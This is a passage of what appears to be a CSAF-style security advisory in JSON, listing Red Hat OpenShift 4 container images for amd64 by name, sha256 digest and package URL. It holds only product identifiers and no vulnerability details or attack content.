"name": "registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:2a8fa4bac908dd97a3be2e302eb6ac1431dc3537beed23caf257d2c3f47bbc74_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:2a8fa4bac908dd97a3be2e302eb6ac1431dc3537beed23caf257d2c3f47bbc74_amd64",
"product_id": "registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:2a8fa4bac908dd97a3be2e302eb6ac1431dc3537beed23caf257d2c3f47bbc74_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-workload-identity-webhook-rhel9@sha256%3A2a8fa4bac908dd97a3be2e302eb6ac1431dc3537beed23caf257d2c3f47bbc74?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844654"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:0b92ec408159a4f0e5308cf58ad89cc4ca40880ce097e0807a19c12f235ca5fc_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:0b92ec408159a4f0e5308cf58ad89cc4ca40880ce097e0807a19c12f235ca5fc_amd64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:0b92ec408159a4f0e5308cf58ad89cc4ca40880ce097e0807a19c12f235ca5fc_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-cluster-api-controllers-rhel9@sha256%3A0b92ec408159a4f0e5308cf58ad89cc4ca40880ce097e0807a19c12f235ca5fc?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849192"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:5628a2419c5721f274edcfe794c881d1fb2af158788c45fbcb7a33f6db9948d4_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:5628a2419c5721f274edcfe794c881d1fb2af158788c45fbcb7a33f6db9948d4_amd64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:5628a2419c5721f274edcfe794c881d1fb2af158788c45fbcb7a33f6db9948d4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-installer-rhel9@sha256%3A5628a2419c5721f274edcfe794c881d1fb2af158788c45fbcb7a33f6db9948d4?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773855356"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:2125f95e12d8c30d743da09f3f8451e70a7b0cd8299b173f748a4affd1aab940_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:2125f95e12d8c30d743da09f3f8451e70a7b0cd8299b173f748a4affd1aab940_amd64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:2125f95e12d8c30d743da09f3f8451e70a7b0cd8299b173f748a4affd1aab940_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-rhel9-operator@sha256%3A2125f95e12d8c30d743da09f3f8451e70a7b0cd8299b173f748a4affd1aab940?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848328"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:2bcdce58a9dec8306ea7ec58ed588c6def1d0e2891d06b91661cb04a1411242f_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:2bcdce58a9dec8306ea7ec58ed588c6def1d0e2891d06b91661cb04a1411242f_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:2bcdce58a9dec8306ea7ec58ed588c6def1d0e2891d06b91661cb04a1411242f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cli-artifacts-rhel9@sha256%3A2bcdce58a9dec8306ea7ec58ed588c6def1d0e2891d06b91661cb04a1411242f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773851099"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:b710c08d2b2cee582d55d2bb5829b0d35375e04c88a1d2e9b7cef725212d0cba_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:b710c08d2b2cee582d55d2bb5829b0d35375e04c88a1d2e9b7cef725212d0cba_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:b710c08d2b2cee582d55d2bb5829b0d35375e04c88a1d2e9b7cef725212d0cba_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cloud-credential-rhel9-operator@sha256%3Ab710c08d2b2cee582d55d2bb5829b0d35375e04c88a1d2e9b7cef725212d0cba?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846707"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2fb1acc8f1c8f4091671c53c1e2944c91a123a386233ae093def99b6ef6963a2_amd64",
"product": {
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2fb1acc8f1c8f4091671c53c1e2944c91a123a386233ae093def99b6ef6963a2_amd64",
"product_id": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2fb1acc8f1c8f4091671c53c1e2944c91a123a386233ae093def99b6ef6963a2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/cloud-network-config-controller-rhel9@sha256%3A2fb1acc8f1c8f4091671c53c1e2944c91a123a386233ae093def99b6ef6963a2?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846745"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:8fecae242c9d6ef4ea859bbb68219912ce75735c53b350ddca2ef230c1dc17af_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:8fecae242c9d6ef4ea859bbb68219912ce75735c53b350ddca2ef230c1dc17af_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:8fecae242c9d6ef4ea859bbb68219912ce75735c53b350ddca2ef230c1dc17af_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-api-rhel9@sha256%3A8fecae242c9d6ef4ea859bbb68219912ce75735c53b350ddca2ef230c1dc17af?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848551"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:97c43c0d0949b12333e19892c20232f1db9e9a4400022b13ce628e20398b1b83_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:97c43c0d0949b12333e19892c20232f1db9e9a4400022b13ce628e20398b1b83_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:97c43c0d0949b12333e19892c20232f1db9e9a4400022b13ce628e20398b1b83_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-authentication-rhel9-operator@sha256%3A97c43c0d0949b12333e19892c20232f1db9e9a4400022b13ce628e20398b1b83?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845520"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:217f0c7a5cae2b5d399977054083acbe87ad4005f7471eb76d6290cd1ec98217_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:217f0c7a5cae2b5d399977054083acbe87ad4005f7471eb76d6290cd1ec98217_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:217f0c7a5cae2b5d399977054083acbe87ad4005f7471eb76d6290cd1ec98217_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-autoscaler-rhel9-operator@sha256%3A217f0c7a5cae2b5d399977054083acbe87ad4005f7471eb76d6290cd1ec98217?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773612481"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:47a0e0bcec249f6ed2003797f66ce095128fb8115326a7d0ef41d528e2445213_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:47a0e0bcec249f6ed2003797f66ce095128fb8115326a7d0ef41d528e2445213_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:47a0e0bcec249f6ed2003797f66ce095128fb8115326a7d0ef41d528e2445213_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-baremetal-operator-rhel9@sha256%3A47a0e0bcec249f6ed2003797f66ce095128fb8115326a7d0ef41d528e2445213?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844989"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:70ece97f4bde794353c6e71255874b17d3af77b1a4d2283460b7188a495c782c_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:70ece97f4bde794353c6e71255874b17d3af77b1a4d2283460b7188a495c782c_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:70ece97f4bde794353c6e71255874b17d3af77b1a4d2283460b7188a495c782c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-bootstrap-rhel9@sha256%3A70ece97f4bde794353c6e71255874b17d3af77b1a4d2283460b7188a495c782c?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847672"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9cb8a702b78977cc3a6e5418210d15a0d431fa56c217cfd8b5f69653d6acb89d_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9cb8a702b78977cc3a6e5418210d15a0d431fa56c217cfd8b5f69653d6acb89d_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9cb8a702b78977cc3a6e5418210d15a0d431fa56c217cfd8b5f69653d6acb89d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-capi-rhel9-operator@sha256%3A9cb8a702b78977cc3a6e5418210d15a0d431fa56c217cfd8b5f69653d6acb89d?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848529"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b96362fcb7b09af38eed2bd77d8720fe128a4c677d3a5d46dbe3b09412fd1fd5_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b96362fcb7b09af38eed2bd77d8720fe128a4c677d3a5d46dbe3b09412fd1fd5_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b96362fcb7b09af38eed2bd77d8720fe128a4c677d3a5d46dbe3b09412fd1fd5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-cloud-controller-manager-rhel9-operator@sha256%3Ab96362fcb7b09af38eed2bd77d8720fe128a4c677d3a5d46dbe3b09412fd1fd5?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846039"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:42396c0e20ce9c8afbfb8c87b80e1b48b0695118a583b1e107f07bae9ead7614_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:42396c0e20ce9c8afbfb8c87b80e1b48b0695118a583b1e107f07bae9ead7614_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:42396c0e20ce9c8afbfb8c87b80e1b48b0695118a583b1e107f07bae9ead7614_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-config-api-rhel9@sha256%3A42396c0e20ce9c8afbfb8c87b80e1b48b0695118a583b1e107f07bae9ead7614?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845449"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:ff132632ffb2f87746e79787cac21fba12a9862a707885dbe9ccf95f2b388941_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:ff132632ffb2f87746e79787cac21fba12a9862a707885dbe9ccf95f2b388941_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:ff132632ffb2f87746e79787cac21fba12a9862a707885dbe9ccf95f2b388941_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-config-rhel9-operator@sha256%3Aff132632ffb2f87746e79787cac21fba12a9862a707885dbe9ccf95f2b388941?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848648"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:15399cbb6b6adc9ec25f1174ad8e04f5c5f5bf0b02d4ee7023b4f38e810aca03_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:15399cbb6b6adc9ec25f1174ad8e04f5c5f5bf0b02d4ee7023b4f38e810aca03_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:15399cbb6b6adc9ec25f1174ad8e04f5c5f5bf0b02d4ee7023b4f38e810aca03_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-control-plane-machine-set-rhel9-operator@sha256%3A15399cbb6b6adc9ec25f1174ad8e04f5c5f5bf0b02d4ee7023b4f38e810aca03?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847476"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:ccd9f2be0df364b640b1e2b8b470bb9a536222383734258e4917bcc0adddec38_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:ccd9f2be0df364b640b1e2b8b470bb9a536222383734258e4917bcc0adddec38_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:ccd9f2be0df364b640b1e2b8b470bb9a536222383734258e4917bcc0adddec38_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256%3Accd9f2be0df364b640b1e2b8b470bb9a536222383734258e4917bcc0adddec38?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844474"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:03747941ed41fbe46a4eea27ccedfde73d5cb56d7da3e6bd58c0591800014e3c_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:03747941ed41fbe46a4eea27ccedfde73d5cb56d7da3e6bd58c0591800014e3c_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:03747941ed41fbe46a4eea27ccedfde73d5cb56d7da3e6bd58c0591800014e3c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-dns-rhel9-operator@sha256%3A03747941ed41fbe46a4eea27ccedfde73d5cb56d7da3e6bd58c0591800014e3c?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849293"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3be19f58c31be0655db45e701bd9852a07ae1fda287301fa8218f2ef56c2ee55_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3be19f58c31be0655db45e701bd9852a07ae1fda287301fa8218f2ef56c2ee55_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3be19f58c31be0655db45e701bd9852a07ae1fda287301fa8218f2ef56c2ee55_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-image-registry-rhel9-operator@sha256%3A3be19f58c31be0655db45e701bd9852a07ae1fda287301fa8218f2ef56c2ee55?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846870"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:5cf69f239d585f936caca1ea97ec5870e6fdfcfee2fdf83984d40e371fa31180_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:5cf69f239d585f936caca1ea97ec5870e6fdfcfee2fdf83984d40e371fa31180_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:5cf69f239d585f936caca1ea97ec5870e6fdfcfee2fdf83984d40e371fa31180_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-ingress-rhel9-operator@sha256%3A5cf69f239d585f936caca1ea97ec5870e6fdfcfee2fdf83984d40e371fa31180?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845267"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:fda1392b4de1ec066e6e816968c6a5af8fe4f33a9dd81216dcac8f34c5824010_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:fda1392b4de1ec066e6e816968c6a5af8fe4f33a9dd81216dcac8f34c5824010_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:fda1392b4de1ec066e6e816968c6a5af8fe4f33a9dd81216dcac8f34c5824010_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-apiserver-rhel9-operator@sha256%3Afda1392b4de1ec066e6e816968c6a5af8fe4f33a9dd81216dcac8f34c5824010?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845950"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:33929a52af39ae582e1c19c4b3598b0b1d83669aed27faa42fdad73798d7b4bc_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:33929a52af39ae582e1c19c4b3598b0b1d83669aed27faa42fdad73798d7b4bc_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:33929a52af39ae582e1c19c4b3598b0b1d83669aed27faa42fdad73798d7b4bc_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-controller-manager-rhel9-operator@sha256%3A33929a52af39ae582e1c19c4b3598b0b1d83669aed27faa42fdad73798d7b4bc?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848026"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:67a5c7868876aa2532948aabd3169bad5b43d278fb72bbc3c7996166605a61a5_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:67a5c7868876aa2532948aabd3169bad5b43d278fb72bbc3c7996166605a61a5_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:67a5c7868876aa2532948aabd3169bad5b43d278fb72bbc3c7996166605a61a5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-scheduler-rhel9-operator@sha256%3A67a5c7868876aa2532948aabd3169bad5b43d278fb72bbc3c7996166605a61a5?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844497"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:0c6fbdff8409ec28cb25730648b32d08787a25e422273635ffcfc12df4adcef9_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:0c6fbdff8409ec28cb25730648b32d08787a25e422273635ffcfc12df4adcef9_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:0c6fbdff8409ec28cb25730648b32d08787a25e422273635ffcfc12df4adcef9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256%3A0c6fbdff8409ec28cb25730648b32d08787a25e422273635ffcfc12df4adcef9?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846260"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:e8a14458a2580a5d8e9719e38fcfad7dcaea488533866d3c784d171383278985_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:e8a14458a2580a5d8e9719e38fcfad7dcaea488533866d3c784d171383278985_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:e8a14458a2580a5d8e9719e38fcfad7dcaea488533866d3c784d171383278985_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-machine-approver-rhel9@sha256%3Ae8a14458a2580a5d8e9719e38fcfad7dcaea488533866d3c784d171383278985?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844499"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:ccac24ab41981b3f052f3cb765e5adec77ca584dbe82272243c846c7f6953064_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:ccac24ab41981b3f052f3cb765e5adec77ca584dbe82272243c846c7f6953064_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:ccac24ab41981b3f052f3cb765e5adec77ca584dbe82272243c846c7f6953064_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-olm-rhel9-operator@sha256%3Accac24ab41981b3f052f3cb765e5adec77ca584dbe82272243c846c7f6953064?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846804"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:119755cb13662c0badea9909769b6d1b68e39ae301528e2d02033fadafb3ada7_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:119755cb13662c0badea9909769b6d1b68e39ae301528e2d02033fadafb3ada7_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:119755cb13662c0badea9909769b6d1b68e39ae301528e2d02033fadafb3ada7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-openshift-apiserver-rhel9-operator@sha256%3A119755cb13662c0badea9909769b6d1b68e39ae301528e2d02033fadafb3ada7?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848745"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:ca2c0901f0ec1756344b5029e2912d6d7bd60c91015dbdf8b9ed704a2f59f6c0_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:ca2c0901f0ec1756344b5029e2912d6d7bd60c91015dbdf8b9ed704a2f59f6c0_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:ca2c0901f0ec1756344b5029e2912d6d7bd60c91015dbdf8b9ed704a2f59f6c0_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-openshift-controller-manager-rhel9-operator@sha256%3Aca2c0901f0ec1756344b5029e2912d6d7bd60c91015dbdf8b9ed704a2f59f6c0?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844782"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:2973ce1c3d9df0e94568fdc45b90f86d6d7c65fa3bf6c319219b9e213a684101_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:2973ce1c3d9df0e94568fdc45b90f86d6d7c65fa3bf6c319219b9e213a684101_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:2973ce1c3d9df0e94568fdc45b90f86d6d7c65fa3bf6c319219b9e213a684101_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-samples-rhel9-operator@sha256%3A2973ce1c3d9df0e94568fdc45b90f86d6d7c65fa3bf6c319219b9e213a684101?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848423"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:17508a3579649b2f104c177ff20decf1792214307cdfd81679075afd2287f266_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:17508a3579649b2f104c177ff20decf1792214307cdfd81679075afd2287f266_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:17508a3579649b2f104c177ff20decf1792214307cdfd81679075afd2287f266_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-update-keys-rhel9@sha256%3A17508a3579649b2f104c177ff20decf1792214307cdfd81679075afd2287f266?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848908"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:bc41319e164e78b324afc58f901a74ac57dbda40bcec111adbfd3341f23d99ac_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:bc41319e164e78b324afc58f901a74ac57dbda40bcec111adbfd3341f23d99ac_amd64",
"product_id": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:bc41319e164e78b324afc58f901a74ac57dbda40bcec111adbfd3341f23d99ac_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-container-networking-plugins-rhel9@sha256%3Abc41319e164e78b324afc58f901a74ac57dbda40bcec111adbfd3341f23d99ac?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845695"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:a0e267de6bed29219c427f960712fef9345af738251bcf9d471895d019ec894d_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:a0e267de6bed29219c427f960712fef9345af738251bcf9d471895d019ec894d_amd64",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:a0e267de6bed29219c427f960712fef9345af738251bcf9d471895d019ec894d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-resizer-rhel9@sha256%3Aa0e267de6bed29219c427f960712fef9345af738251bcf9d471895d019ec894d?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844470"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:dc09c24ed64144c3786b201426b0d796896d5d4ab5c512be8b384863d6f02884_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:dc09c24ed64144c3786b201426b0d796896d5d4ab5c512be8b384863d6f02884_amd64",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:dc09c24ed64144c3786b201426b0d796896d5d4ab5c512be8b384863d6f02884_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-snapshotter-rhel9@sha256%3Adc09c24ed64144c3786b201426b0d796896d5d4ab5c512be8b384863d6f02884?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849297"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:7d1370d3d3a2f2f50cffd40783e46a0c830cb7326231de0c620d71c832422fc4_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:7d1370d3d3a2f2f50cffd40783e46a0c830cb7326231de0c620d71c832422fc4_amd64",
"product_id": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:7d1370d3d3a2f2f50cffd40783e46a0c830cb7326231de0c620d71c832422fc4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-snapshot-controller-rhel9@sha256%3A7d1370d3d3a2f2f50cffd40783e46a0c830cb7326231de0c620d71c832422fc4?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848645"
}
}
},
{
"category": "product_version",
